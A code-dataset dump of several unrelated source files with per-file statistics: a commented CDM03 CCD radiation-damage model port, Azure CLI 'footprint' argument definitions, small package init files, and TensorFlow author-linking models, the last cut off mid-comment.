# out[self.values['ysize']:, :self.values['xsize']] = tmp
# elif quad == 3:
# d = data[self.values['ysize']:, self.values['xsize']:].copy()
# tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
# out[self.values['ysize']:, self.values['xsize']:] = tmp
# else:
# print 'ERROR -- too many quadrants!!'
# self.log.error('Too many quadrants! This method allows only four quadrants.')
#
# return out
#
#
# def applyRadiationDamage(self, data, nt_p, sigma_p, taur_p, nt_s, sigma_s, taur_s, rdose=1.6e10, iquadrant=0):
# """
# Apply radiation damage based on FORTRAN CDM03 model. The method assumes that
# input data covers only a single quadrant defined by the iquadrant integer.
#
# :param data: imaging data to which the CDM03 model will be applied to.
# :type data: ndarray
#
# :param iquadrant: number of the quadrant to process
# :type iquadrant: int
#
# :return: image that has been run through the CDM03 model
# :rtype: ndarray
# """
# iflip = iquadrant / 2
# jflip = iquadrant % 2
#
# if self.logger:
# self.log.info('nt_p=' + str(nt_p))
# self.log.info('nt_s=' + str(nt_s))
# self.log.info('sigma_p= ' + str(sigma_p))
# self.log.info('sigma_s= ' + str(sigma_s))
# self.log.info('taur_p= ' + str(taur_p))
# self.log.info('taur_s= ' + str(taur_s))
# self.log.info('dob=%f' % self.values['dob'])
# self.log.info('rdose=%e' % self.values['rdose'])
# self.log.info('xsize=%i' % data.shape[1])
# self.log.info('ysize=%i' % data.shape[0])
# self.log.info('quadrant=%i' % iquadrant)
# self.log.info('iflip=%i' % iflip)
# self.log.info('jflip=%i' % jflip)
#
# #return run(data, nt_s, sigma_p, taur_p, nt_s, sigma_s, taur_s, iflip, jflip, True, True)
# return run(data)#, [nt_s, sigma_p, taur_p, nt_s, sigma_s, taur_s, iflip, jflip, 1, 1])
#
#
# @autojit
# #@jit(double[:,:], double[:], double[:], double[:], double[:], double[:], double[:], int, int, int, int)
# #def run(image, nt_p, sigma_p, tr_p, nt_s, sigma_s, tr_s, iflip, jflip, parallel, serial):
# #@jit(argtypes=[double[:,:], [double[:], double[:], double[:], double[:], double[:], double[:], int16, int16, int16, int16]])
# #def run(image, params):
# #@jit(argtypes=double[:,:], restype=double[:,:])
# def run(image):
# parallel = 'cdm_euclid_parallel.dat'
# serial = 'cdm_euclid_serial.dat'
# trapdata = np.loadtxt(parallel)
# nt_p = trapdata[:, 0]
# sigma_p = trapdata[:, 1]
# tr_p = trapdata[:, 2]
#
# trapdata = np.loadtxt(serial)
# nt_s = trapdata[:, 0]
# sigma_s = trapdata[:, 1]
# tr_s = trapdata[:, 2]
#
# iflip = 0
# jflip = 0
# parallel = True
# serial = True
#
# rdose = 8.0e9; dob = 0.0; beta_p = 0.6; beta_s = 0.6
# fwc = 200000.; vth = 1.168e7; vg = 6.e-11; t = 20.48e-3
# sfwc = 730000.; svg = 1.0e-10; st = 5.0e-6
#
# # absolute trap density which should be scaled according to radiation dose
# # (nt=1.5e10 gives approx fit to GH data for a dose of 8e9 10MeV equiv. protons)
# nt_p = nt_p * rdose #absolute trap density [per cm**3]
# nt_s = nt_s * rdose #absolute trap density [per cm**3]
#
# #array sizes
# ydim, xdim = image.shape
# zdim_p = len(nt_p)
# zdim_s = len(nt_s)
#
# #work arrays
# #s = np.zeros_like(image)
# no = np.zeros_like(image, dtype=np.float64)
# sno = np.zeros_like(image,dtype=np.float64)
# sout = np.zeros_like(image,dtype=np.float64)
#
# #flip data for Euclid depending on the quadrant being processed and
# #rotate (j, i slip in s) to move from Euclid to Gaia coordinate system
# #because this is what is assumed in CDM03 (EUCLID_TN_ESA_AS_003_0-2.pdf)
# #for i in range(xdim):
# # for j in range(ydim):
# # s[j, i] = image[i+iflip*(xdim+1-2*i), j+jflip*(ydim+1-2*j)]
# s = image.copy()
#
# #add background electrons
# s += dob
#
# #apply FWC (anti-blooming)
# msk = s > fwc
# s[msk] = fwc
#
# #start with parallel direction
# if parallel:
# print 'adding parallel'
# alpha_p = t*sigma_p*vth*fwc**beta_p/2./vg
# g_p = nt_p*2.*vg/fwc**beta_p
#
# for i in range(ydim):
# print i
# gamm_p = g_p * i
# for k in range(zdim_p):
# for j in range(xdim):
# nc = 0.
#
# if s[i, j] > 0.01:
# nc = max((gamm_p[k]*s[i,j]**beta_p - no[j,k])/(gamm_p[k]*s[i,j]**(beta_p - 1.) + 1.) *
# (1.-np.exp(-alpha_p[k]*s[i,j]**(1.-beta_p))), 0.0)
#
# no[j,k] = no[j,k] + nc
# nr = no[j,k] * (1. - np.exp(-t/tr_p[k]))
# s[i,j] = s[i,j] - nc + nr
# no[j,k] = no[j,k] - nr
#
# #now serial direction
# if serial:
# print 'adding serial'
# alpha_s=st*sigma_s*vth*sfwc**beta_s/2./svg
# g_s=nt_s*2.*svg/sfwc**beta_s
#
# for j in range(xdim):
# print j
# gamm_s = g_s * j
# for k in range(zdim_s):
# if tr_s[k] < t:
# for i in range(ydim):
# nc = 0.
#
# if s[i,j] > 0.01:
# nc = max((gamm_s[k]*s[i,j]**beta_s-sno[i,k])/(gamm_s[k]*s[i,j]**(beta_s-1.)+1.) *
# (1.-np.exp(-alpha_s[k]*s[i,j]**(1.-beta_s))), 0.)
#
# sno[i,k] = sno[i,k] + nc
# nr = sno[i,k] * (1. - np.exp(-st/tr_s[k]))
# s[i,j] = s[i,j] - nc + nr
# sno[i,k] = sno[i,k] - nr
#
#
# # We need to rotate back from Gaia coordinate system and
# # flip data back to the input orientation
# for i in range(ydim):
# for j in range(xdim):
# sout[i+iflip*(xdim+1-2*i), j+jflip*(ydim+1-2*j)] = s[j, i]
#
# return sout
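# --- illustrative sketch (added; not part of the original module) ---
# The commented-out pure-Python port above encodes the core CDM03 recurrence:
# for every pixel, charge is captured into each trap species (nc) and released
# back (nr) according to that species' release time constant. The helper below
# restates only the parallel-direction update for readability; the constants
# default to the CCD/clocking values hard-coded above, nt_p is assumed to be
# the absolute (dose-scaled) trap density, and the loop is a slow reference,
# not a performance-oriented port.
def parallel_cti_sketch(s, nt_p, sigma_p, tr_p, beta_p=0.6,
                        fwc=200000., vth=1.168e7, vg=6.e-11, t=20.48e-3):
    """Apply the parallel-direction CDM03 capture/release to image s in place."""
    ydim, xdim = s.shape
    no = np.zeros((xdim, len(nt_p)))                  # trapped charge per column and species
    alpha_p = t * sigma_p * vth * fwc**beta_p / 2. / vg
    g_p = nt_p * 2. * vg / fwc**beta_p
    for i in range(ydim):                             # transfer distance grows with the row index
        gamm_p = g_p * i
        for k in range(len(nt_p)):                    # loop over trap species
            for j in range(xdim):
                nc = 0.
                if s[i, j] > 0.01:
                    nc = max((gamm_p[k] * s[i, j]**beta_p - no[j, k]) /
                             (gamm_p[k] * s[i, j]**(beta_p - 1.) + 1.) *
                             (1. - np.exp(-alpha_p[k] * s[i, j]**(1. - beta_p))), 0.0)
                no[j, k] += nc                        # charge captured by the traps
                nr = no[j, k] * (1. - np.exp(-t / tr_p[k]))
                s[i, j] += nr - nc                    # remove captured, add released charge
                no[j, k] -= nr
    return s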
| 40.702156
| 127
| 0.54932
| 3,877
| 30,201
| 4.235233
| 0.092597
| 0.075518
| 0.043849
| 0.045311
| 0.842996
| 0.8257
| 0.8081
| 0.790438
| 0.7662
| 0.754324
| 0
| 0.01962
| 0.31989
| 30,201
| 742
| 128
| 40.702156
| 0.779796
| 0.370286
| 0
| 0.724771
| 0
| 0
| 0.109382
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.022936
| null | null | 0.027523
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8c231197640a223590afdf184652cb63e91b1f79
| 115
|
py
|
Python
|
loqusdb/build_models/__init__.py
|
bjhall/loqusdb
|
55ee806662848eeffd266bf65d4b4eb24e534a89
|
[
"MIT"
] | 4
|
2018-06-04T12:42:45.000Z
|
2021-03-29T20:36:12.000Z
|
loqusdb/build_models/__init__.py
|
bjhall/loqusdb
|
55ee806662848eeffd266bf65d4b4eb24e534a89
|
[
"MIT"
] | 50
|
2016-02-26T07:54:39.000Z
|
2021-10-12T07:52:01.000Z
|
loqusdb/build_models/__init__.py
|
bjhall/loqusdb
|
55ee806662848eeffd266bf65d4b4eb24e534a89
|
[
"MIT"
] | 8
|
2016-02-29T13:50:46.000Z
|
2020-04-22T10:15:23.000Z
|
from .case import build_case
from .variant import build_variant
from .profile_variant import build_profile_variant
| 28.75
| 50
| 0.869565
| 17
| 115
| 5.588235
| 0.352941
| 0.347368
| 0.378947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104348
| 115
| 3
| 51
| 38.333333
| 0.92233
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4fbedd56ba9ba1a4eec0e53d1d78049d6335d4de
| 13,886
|
py
|
Python
|
src/footprint/azext_footprint/generated/_params.py
|
amecodegenbot/azure-cli-extensions
|
bea863256d7c6ba84ceaeca7df12c34d87f80477
|
[
"MIT"
] | null | null | null |
src/footprint/azext_footprint/generated/_params.py
|
amecodegenbot/azure-cli-extensions
|
bea863256d7c6ba84ceaeca7df12c34d87f80477
|
[
"MIT"
] | null | null | null |
src/footprint/azext_footprint/generated/_params.py
|
amecodegenbot/azure-cli-extensions
|
bea863256d7c6ba84ceaeca7df12c34d87f80477
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
# pylint: disable=too-many-statements
from azure.cli.core.commands.parameters import (
tags_type,
get_enum_type,
resource_group_name_type,
get_location_type
)
from azure.cli.core.commands.validators import get_default_location_from_resource_group
def load_arguments(self, _):
with self.argument_context('footprint profile list') as c:
c.argument('resource_group_name', resource_group_name_type)
with self.argument_context('footprint profile show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint profile '
'resource.', id_part='name')
with self.argument_context('footprint profile create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint profile '
'resource.')
c.argument('tags', tags_type)
c.argument('location', arg_type=get_location_type(self.cli_ctx),
validator=get_default_location_from_resource_group)
c.argument('description', type=str, help='The description of the Footprint profile.')
c.argument('start_delay_milliseconds', type=int, help='The delay in milliseconds that the clients should wait '
'for until they start performing measurements.')
c.argument('measurement_count', type=int, help='The number of measurements to perform.')
c.argument('cold_path_sampling_percentage_rate', type=float, help='The default sampling percentage for cold '
'path measurement storage.')
c.argument('reporting_endpoints', nargs='*', help='The endpoints which to upload measurements to.')
with self.argument_context('footprint profile update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint profile '
'resource.', id_part='name')
c.argument('tags', tags_type)
with self.argument_context('footprint profile delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint profile '
'resource.', id_part='name')
with self.argument_context('footprint measurement-endpoint list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.')
with self.argument_context('footprint measurement-endpoint show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.', id_part='name')
c.argument('measurement_endpoint_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint '
'measurement endpoint resource.', id_part='child_name_1')
with self.argument_context('footprint measurement-endpoint create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.')
c.argument('measurement_endpoint_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint '
'measurement endpoint resource.')
c.argument('description', type=str, help='The description of a measurement endpoint.')
c.argument('endpoint', type=str, help='The value of a measurement endpoint.')
c.argument('measurement_type', type=int, help='The type of a measurement endpoint.')
c.argument('weight', type=int, help='The weight of a measurement endpoint, higher weight means higher '
'priority.')
c.argument('experiment_id', type=str, help='The id of an experiment that a measurement endpoint is part of.')
c.argument('object_path', type=str, help='The path of the object that a measurement endpoint points to.')
c.argument('start_time_utc', help='The start time that a measurement endpoint should be served.')
c.argument('end_time_utc', help='The end time that a measurement endpoint should be served.')
c.argument('hot_path_sampling_percentage_rate', type=float, help='The percentual sampling rate for the hot '
'path logging of a measurement endpoint.')
c.argument('warm_path_sampling_percentage_rate', type=float, help='The percentual sampling rate for the warm '
'path logging of a measurement endpoint.')
c.argument('cold_path_sampling_percentage_rate_override', type=float, help='The percentual sampling rate for '
'the cold path logging of a measurement endpoint.')
c.argument('metadata', type=str, help='The metadata of a measurement endpoint.')
with self.argument_context('footprint measurement-endpoint update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.', id_part='name')
c.argument('measurement_endpoint_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint '
'measurement endpoint resource.', id_part='child_name_1')
c.argument('description', type=str, help='The description of a measurement endpoint.')
c.argument('endpoint', type=str, help='The value of a measurement endpoint.')
c.argument('measurement_type', type=int, help='The type of a measurement endpoint.')
c.argument('weight', type=int, help='The weight of a measurement endpoint, higher weight means higher '
'priority.')
c.argument('experiment_id', type=str, help='The id of an experiment that a measurement endpoint is part of.')
c.argument('object_path', type=str, help='The path of the object that a measurement endpoint points to.')
c.argument('start_time_utc', help='The start time that a measurement endpoint should be served.')
c.argument('end_time_utc', help='The end time that a measurement endpoint should be served.')
c.argument('hot_path_sampling_percentage_rate', type=float, help='The percentual sampling rate for the hot '
'path logging of a measurement endpoint.')
c.argument('warm_path_sampling_percentage_rate', type=float, help='The percentual sampling rate for the warm '
'path logging of a measurement endpoint.')
c.argument('cold_path_sampling_percentage_rate_override', type=float, help='The percentual sampling rate for '
'the cold path logging of a measurement endpoint.')
c.argument('metadata', type=str, help='The metadata of a measurement endpoint.')
with self.argument_context('footprint measurement-endpoint delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.', id_part='name')
c.argument('measurement_endpoint_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint '
'measurement endpoint resource.', id_part='child_name_1')
with self.argument_context('footprint measurement-endpoint-condition list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.')
c.argument('measurement_endpoint_name', type=str, help='Name of the Footprint measurement endpoint resource.')
with self.argument_context('footprint measurement-endpoint-condition show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.', id_part='name')
c.argument('measurement_endpoint_name', type=str, help='Name of the Footprint measurement endpoint resource.',
id_part='child_name_1')
c.argument('condition_name', type=str, help='Name of the Footprint measurement endpoint condition resource.',
id_part='child_name_2')
with self.argument_context('footprint measurement-endpoint-condition create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.')
c.argument('measurement_endpoint_name', type=str, help='Name of the Footprint measurement endpoint resource.')
c.argument('condition_name', type=str, help='Name of the Footprint measurement endpoint condition resource.')
c.argument('variable', type=str, help='The variable of a Footprint measurement endpoint condition.')
c.argument('operator',
arg_type=get_enum_type(['IsExactValue', 'MatchValueIgnoreCasing', 'ContainsValue',
'ContainsValueIgnoreCasing', 'DoesNotContainValue',
'DoesNotContainValueIgnoreCasing']),
help='The operator of a Footprint measurement endpoint condition.')
c.argument('constant', type=str, help='The constant of a Footprint measurement endpoint condition.')
with self.argument_context('footprint measurement-endpoint-condition update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.', id_part='name')
c.argument('measurement_endpoint_name', type=str, help='Name of the Footprint measurement endpoint resource.',
id_part='child_name_1')
c.argument('condition_name', type=str, help='Name of the Footprint measurement endpoint condition resource.',
id_part='child_name_2')
c.argument('variable', type=str, help='The variable of a Footprint measurement endpoint condition.')
c.argument('operator',
arg_type=get_enum_type(['IsExactValue', 'MatchValueIgnoreCasing', 'ContainsValue',
'ContainsValueIgnoreCasing', 'DoesNotContainValue',
'DoesNotContainValueIgnoreCasing']),
help='The operator of a Footprint measurement endpoint condition. Swagger name=operator')
c.argument('constant', type=str, help='The constant of a Footprint measurement endpoint condition.')
with self.argument_context('footprint measurement-endpoint-condition delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.', id_part='name')
c.argument('measurement_endpoint_name', type=str, help='Name of the Footprint measurement endpoint resource.',
id_part='child_name_1')
c.argument('condition_name', type=str, help='Name of the Footprint measurement endpoint condition resource.',
id_part='child_name_2')
with self.argument_context('footprint experiment list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.')
with self.argument_context('footprint experiment show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.', id_part='name')
c.argument('experiment_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint experiment '
'resource.', id_part='child_name_1')
with self.argument_context('footprint experiment create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.')
c.argument('experiment_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint experiment '
'resource.')
c.argument('description', type=str, help='The description of a Footprint experiment.')
with self.argument_context('footprint experiment update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.', id_part='name')
c.argument('experiment_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint experiment '
'resource.', id_part='child_name_1')
c.argument('description', type=str, help='The description of a Footprint experiment.')
with self.argument_context('footprint experiment delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('profile_name', type=str, help='Name of the Footprint profile resource.', id_part='name')
c.argument('experiment_name', options_list=['--name', '-n'], type=str, help='Name of the Footprint experiment '
'resource.', id_part='child_name_1')
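# --- usage note (added for illustration; not part of the generated module) ---
# The argument contexts above map `az footprint ...` sub-commands to their
# parameters. A hypothetical invocation exercising the 'footprint profile
# create' context might look like the following, assuming the usual
# --resource-group/-g flag supplied by resource_group_name_type and the
# hyphenated long options that the CLI derives from the argument names:
#
#   az footprint profile create -g myGroup -n myProfile \
#       --measurement-count 10 --start-delay-milliseconds 1000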
| 70.846939
| 119
| 0.68335
| 1,750
| 13,886
| 5.248
| 0.085714
| 0.094077
| 0.06348
| 0.058798
| 0.910932
| 0.903528
| 0.883384
| 0.870971
| 0.853767
| 0.84865
| 0
| 0.001075
| 0.196097
| 13,886
| 195
| 120
| 71.210256
| 0.821643
| 0.03644
| 0
| 0.745342
| 0
| 0
| 0.489677
| 0.060518
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006211
| false
| 0
| 0.012422
| 0
| 0.018634
| 0.403727
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
4fc61f47f3eef6a2a4ec8c5909b8fb3b03a3725d
| 208
|
py
|
Python
|
src/dmt/__init__.py
|
SINTEF/dmt-gen-common
|
4f1ce6c303edbdcd25b69dc02c55b492540cd262
|
[
"MIT"
] | null | null | null |
src/dmt/__init__.py
|
SINTEF/dmt-gen-common
|
4f1ce6c303edbdcd25b69dc02c55b492540cd262
|
[
"MIT"
] | null | null | null |
src/dmt/__init__.py
|
SINTEF/dmt-gen-common
|
4f1ce6c303edbdcd25b69dc02c55b492540cd262
|
[
"MIT"
] | null | null | null |
from .package_generator import PackageGenerator
from .base_generator import BaseGenerator
from .basic_template_generator import BasicTemplateGenerator
from .template_generator import TemplateBasedGenerator
| 52
| 61
| 0.894231
| 21
| 208
| 8.619048
| 0.52381
| 0.331492
| 0.254144
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086538
| 208
| 4
| 62
| 52
| 0.952632
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4fdcf3f21348cebde8464ce55748204753a3c34d
| 10,835
|
py
|
Python
|
aid/models.py
|
noa/naacl2021
|
8ca2fe6d49571d89965cebde237bc4751cc7c75a
|
[
"Apache-2.0"
] | 2
|
2021-05-30T20:39:41.000Z
|
2021-11-15T10:33:13.000Z
|
aid/models.py
|
noa/naacl2021
|
8ca2fe6d49571d89965cebde237bc4751cc7c75a
|
[
"Apache-2.0"
] | null | null | null |
aid/models.py
|
noa/naacl2021
|
8ca2fe6d49571d89965cebde237bc4751cc7c75a
|
[
"Apache-2.0"
] | 1
|
2021-06-14T14:53:38.000Z
|
2021-06-14T14:53:38.000Z
|
# Copyright 2021 Johns Hopkins University. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.keras.layers import Dense
from tensorflow.keras.layers import Embedding
from tensorflow.keras.layers import Conv1D
from tensorflow.keras.layers import SeparableConv1D
from tensorflow_addons.layers import GroupNormalization
from aid.features import F
from aid.layers import SimpleAttentionEncoder
from aid.layers import LayerNormalizedProjection
class LinkModel(tf.keras.Model):
def __init__(self, num_symbols=None, num_action_types=None,
padded_length=None, episode_len=16,
embedding_dim=512, num_layers=2, d_model=256,
num_heads=4, dff=256, dropout_rate=0.1,
subword_embed_dim=512, action_embed_dim=512,
filter_activation='relu', num_filters=256,
min_filter_width=2, max_filter_width=5,
final_activation='relu', use_gn=False, use_GLU=False,
use_attn_text_encoder=False,
use_separable_conv=False, time_encoding='one_hot',
**kwargs):
super(LinkModel, self).__init__(**kwargs)
self.embedding_dim = embedding_dim
self.num_symbols = num_symbols
self.num_action_types = num_action_types
self.padded_length = padded_length
self.episode_len = episode_len
self.num_layers = num_layers
self.d_model = d_model
self.num_heads = num_heads
self.dff = dff
self.dropout_rate = dropout_rate
self.subword_embed_dim = subword_embed_dim
self.action_embed_dim = action_embed_dim
self.min_filter_width = min_filter_width
self.max_filter_width = max_filter_width
self.num_filters = num_filters
self.filter_activation = filter_activation
self.final_activation = final_activation
self.use_gn = use_gn
self.use_GLU = use_GLU
self.use_attn_text_encoder = use_attn_text_encoder
self.time_encoding = time_encoding
self.use_separable_conv = use_separable_conv
self.subword_embedding = Embedding(self.num_symbols, self.subword_embed_dim,
name='subword_embedding')
self.action_embedding = Embedding(self.num_action_types,
self.action_embed_dim,
name='action_embedding')
if self.use_attn_text_encoder:
self.attn_text_encoder = SimpleAttentionEncoder(d_model=self.subword_embed_dim,
num_layers=self.num_layers)
else:
for width in range(self.min_filter_width, self.max_filter_width + 1):
if self.use_separable_conv:
conv = SeparableConv1D(self.num_filters, width,
depth_multiplier=1, activation=self.filter_activation)
else:
conv = Conv1D(self.num_filters, width, activation=self.filter_activation)
setattr(self, f'conv_{width}', conv)
if self.use_gn:
setattr(self, f'norm_{width}', GroupNormalization())
self.dense_1 = Dense(self.d_model)
self.encoder = SimpleAttentionEncoder(d_model=self.d_model, num_layers=self.num_layers)
self.mlp = LayerNormalizedProjection(self.embedding_dim,
activation=self.final_activation)
@tf.function
def call(self, inputs, training=False):
features = []
# Extract text features
net = inputs[F.SYMBOLS.value]
batch_size = tf.shape(net)[0]
episode_len = tf.shape(net)[1]
net = tf.reshape(net, [-1, self.padded_length])
swe = self.subword_embedding(net)
if self.use_attn_text_encoder:
net = self.attn_text_encoder(swe, training=training)
else:
fs = []
for width in range(self.min_filter_width, self.max_filter_width + 1):
layer = getattr(self, f'conv_{width}')
net = layer(swe)
if self.use_gn:
layer_norm = getattr(self, f'norm_{width}')
net = layer_norm(net)
net = tf.reduce_max(net, axis=1, keepdims=False)
fs.append(net)
net = tf.concat(fs, axis=-1)
feature_dim = net.get_shape()[-1]
net = tf.reshape(net, [batch_size, episode_len, feature_dim])
features.append(net)
# Action embedding
embedded_actions = self.action_embedding(inputs[F.ACTION_TYPE.value])
features.append(embedded_actions)
# Hour embedding
hour = inputs[F.HOUR.value]
features.append(tf.one_hot(hour, 24, dtype=tf.float32, name='hour_onehot'))
lengths = inputs[F.NUM_POSTS.value]
lengths = tf.reshape(lengths, [batch_size])
mask = tf.sequence_mask(lengths, maxlen=episode_len)
# Day embedding
if F.DAY.value in inputs:
features.append(tf.one_hot(inputs[F.DAY.value], 7, dtype=tf.float32, name='day_onehot'))
net = tf.concat(features, axis=-1)
net = self.dense_1(net) # [batch_size, dim]
net = self.encoder(net, training=training, mask=mask)
net = self.mlp(net, training=training)
return net
class LinkTextTimeModel(tf.keras.Model):
def __init__(self, num_symbols=None, num_action_types=None,
padded_length=None, episode_len=16,
embedding_dim=512, num_layers=2, d_model=256,
num_heads=4, dff=256, dropout_rate=0.1,
subword_embed_dim=512, action_embed_dim=512,
filter_activation='relu', num_filters=256,
min_filter_width=2, max_filter_width=5,
final_activation='relu', use_gn=False, use_GLU=False,
use_attn_text_encoder=False,
use_separable_conv=False, time_encoding='one_hot',
**kwargs):
super(LinkTextTimeModel, self).__init__(**kwargs)
self.embedding_dim = embedding_dim
self.num_symbols = num_symbols
self.num_action_types = num_action_types
self.padded_length = padded_length
self.episode_len = episode_len
self.num_layers = num_layers
self.d_model = d_model
self.num_heads = num_heads
self.dff = dff
self.dropout_rate = dropout_rate
self.subword_embed_dim = subword_embed_dim
self.action_embed_dim = action_embed_dim
self.min_filter_width = min_filter_width
self.max_filter_width = max_filter_width
self.num_filters = num_filters
self.filter_activation = filter_activation
self.final_activation = final_activation
self.use_gn = use_gn
self.use_GLU = use_GLU
self.use_attn_text_encoder = use_attn_text_encoder
self.time_encoding = time_encoding
self.use_separable_conv = use_separable_conv
self.subword_embedding = Embedding(self.num_symbols, self.subword_embed_dim,
name='subword_embedding')
if self.use_attn_text_encoder:
self.attn_text_encoder = SimpleAttentionEncoder(d_model=self.subword_embed_dim,
num_layers=self.num_layers)
else:
for width in range(self.min_filter_width, self.max_filter_width + 1):
if self.use_separable_conv:
conv = SeparableConv1D(self.num_filters, width,
depth_multiplier=1, activation=self.filter_activation)
else:
conv = Conv1D(self.num_filters, width, activation=self.filter_activation)
setattr(self, f'conv_{width}', conv)
if self.use_gn:
setattr(self, f'norm_{width}', GroupNormalization())
self.dense_1 = Dense(self.d_model)
self.encoder = SimpleAttentionEncoder(d_model=self.d_model, num_layers=self.num_layers)
self.mlp = LayerNormalizedProjection(self.embedding_dim,
activation=self.final_activation)
@tf.function
def call(self, inputs, training=False):
features = []
# Extract text features
net = inputs[F.SYMBOLS.value]
batch_size = tf.shape(net)[0]
episode_len = tf.shape(net)[1]
net = tf.reshape(net, [-1, self.padded_length])
swe = self.subword_embedding(net)
if self.use_attn_text_encoder:
net = self.attn_text_encoder(swe, training=training)
else:
fs = []
for width in range(self.min_filter_width, self.max_filter_width + 1):
layer = getattr(self, f'conv_{width}')
net = layer(swe)
if self.use_gn:
layer_norm = getattr(self, f'norm_{width}')
net = layer_norm(net)
net = tf.reduce_max(net, axis=1, keepdims=False)
fs.append(net)
net = tf.concat(fs, axis=-1)
feature_dim = net.get_shape()[-1]
net = tf.reshape(net, [batch_size, episode_len, feature_dim])
features.append(net)
# No Action embedding
# Hour embedding
hour = inputs[F.HOUR.value]
features.append(tf.one_hot(hour, 24, dtype=tf.float32, name='hour_onehot'))
# Day embedding
if F.DAY.value in inputs:
features.append(tf.one_hot(inputs[F.DAY.value], 7, dtype=tf.float32, name='day_onehot'))
lengths = inputs[F.NUM_POSTS.value]
lengths = tf.reshape(lengths, [batch_size])
mask = tf.sequence_mask(lengths, maxlen=episode_len)
net = tf.concat(features, axis=-1)
net = self.dense_1(net) # [batch_size, dim]
net = self.encoder(net, training=training, mask=mask)
net = self.mlp(net, training=training)
return net
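# --- instantiation sketch (added; not part of the original module) ---
# A minimal, hedged smoke test for the LinkModel class defined above: it builds
# the model with placeholder vocabulary sizes and runs a forward pass on random
# dummy features. Shapes follow how `call` consumes the inputs dict
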